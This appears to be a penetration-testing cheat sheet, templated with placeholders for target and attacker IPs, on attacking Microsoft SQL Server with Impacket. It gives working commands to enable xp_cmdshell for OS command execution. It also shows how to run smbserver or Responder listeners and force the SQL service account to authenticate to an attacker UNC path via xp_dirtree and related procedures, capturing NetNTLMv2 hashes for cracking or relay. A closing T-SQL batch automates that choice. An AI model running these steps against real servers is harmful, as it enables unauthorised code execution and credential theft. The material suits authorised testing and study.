Using some Impacket tools (on Kali the same script is packaged as impacket-mssqlclient)
mssqlclient.py <user>@<% tp.frontmatter.target_ip %> -windows-auth
-windows-auth is for Windows logins (DOMAIN\user); drop it for SQL logins such as sa
Once connected, enumerate what you are and what you can see
select name from sys.databases
EXEC sp_databases
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
(this lists your effective server-level permissions; CONTROL SERVER or ALTER SETTINGS here means the xp_cmdshell steps below will work)
SELECT name FROM master.sys.databases
Switch DBs
use <db>
Show all tables of the current DB (sysobjects is the legacy view; INFORMATION_SCHEMA works from any DB if you prefix the DB name)
SELECT name FROM sysobjects WHERE xtype = 'U'
SELECT * FROM <db_NAME>.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'
sp_configure and RECONFIGURE need sysadmin (or the ALTER SETTINGS server permission), so this often fails, but it is always worth trying
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
Example of code execution (if the above commands work). Use single quotes; double quotes are treated as identifiers when QUOTED_IDENTIFIER is on. Commands run as the SQL Server service account (or its configured proxy account)
EXEC xp_cmdshell 'whoami'
Impacket's shell also has built-ins for this: enable_xp_cmdshell, then xp_cmdshell whoami
On your machine, start one listener (on Kali the script is packaged as impacket-smbserver). Pick either smbserver or Responder, not both; they both bind port 445
sudo smbserver.py share ./ -smb2support
sudo responder -I tun0
A few ways to force the server to authenticate to your listener (run these inside MSSQL). The share name is irrelevant: NTLM authentication completes before any share is requested. What you capture is the NetNTLMv2 of the SQL Server service account, which you can crack offline or relay to hosts that do not require SMB signing
xp_dirtree '\\<% tp.frontmatter.my_ip %>\pwn'
exec master.dbo.xp_dirtree '\\<% tp.frontmatter.my_ip %>\pwn'
EXEC master..xp_subdirs '\\<% tp.frontmatter.my_ip %>\pwn'
EXEC master..xp_fileexist '\\<% tp.frontmatter.my_ip %>\pwn'
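The whole decision above, as an added example that is not part of the original notes or of Impacket: one T-SQL batch that checks whether the login is sysadmin, enables xp_cmdshell only if it is off (and puts it back afterwards), and otherwise falls back to the UNC-path procedures, each wrapped in TRY/CATCH so a permission error on one does not stop the others. It assumes <% tp.frontmatter.my_ip %> expands to your listener address, as elsewhere on this page.

```sql
-- Added example, not from the original notes or Impacket: choose between
-- xp_cmdshell and NTLM coercion based on what the current login can do.
-- Run as ONE batch (sqlcmd / SSMS, or everything on a single line with
-- mssqlclient -file); impacket's shell sends each input line as its own
-- query, so DECLAREd variables would not survive across lines there.
-- <% tp.frontmatter.my_ip %> is the listener address, as elsewhere on this page.

-- Who am I on this server, and is xp_cmdshell already on?
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin,   -- 1 = sp_configure will work
       CAST(value_in_use AS INT) AS xp_cmdshell_on     -- state before we touch it
FROM sys.configurations
WHERE name = 'xp_cmdshell';

IF IS_SRVROLEMEMBER('sysadmin') = 1
BEGIN
    -- Remember the original state so the server is left as we found it
    DECLARE @was_on INT = (SELECT CAST(value_in_use AS INT)
                           FROM sys.configurations WHERE name = 'xp_cmdshell');
    IF @was_on = 0
    BEGIN
        EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
        EXEC sp_configure 'xp_cmdshell', 1;           RECONFIGURE;
    END;

    -- Runs as the SQL Server service account (or its proxy account, if set);
    -- output comes back as rows, terminated by a NULL row
    EXEC master..xp_cmdshell 'whoami';

    IF @was_on = 0
    BEGIN
        EXEC sp_configure 'xp_cmdshell', 0;           RECONFIGURE;
        EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
    END;
END
ELSE
BEGIN
    -- Not sysadmin: make the service account authenticate to our listener.
    -- The share name is arbitrary; NTLM auth finishes at session setup,
    -- before any tree connect, so the listener never has to export "pwn".
    -- EXECUTE on these procedures is granted separately, hence one TRY/CATCH each.
    DECLARE @unc NVARCHAR(260) = N'\\<% tp.frontmatter.my_ip %>\pwn';

    BEGIN TRY  EXEC master..xp_dirtree @unc, 1, 1;  END TRY
    BEGIN CATCH SELECT 'xp_dirtree'   AS proc_name, ERROR_MESSAGE() AS err; END CATCH;

    BEGIN TRY  EXEC master..xp_subdirs @unc;        END TRY
    BEGIN CATCH SELECT 'xp_subdirs'   AS proc_name, ERROR_MESSAGE() AS err; END CATCH;

    BEGIN TRY  EXEC master..xp_fileexist @unc;      END TRY
    BEGIN CATCH SELECT 'xp_fileexist' AS proc_name, ERROR_MESSAGE() AS err; END CATCH;
END;
```

The first SELECT is worth running on its own before anything else: if is_sysadmin is 0, skip straight to the coercion procedures and have the listener up before you send the batch, because the authentication attempt happens as soon as the UNC path is resolved.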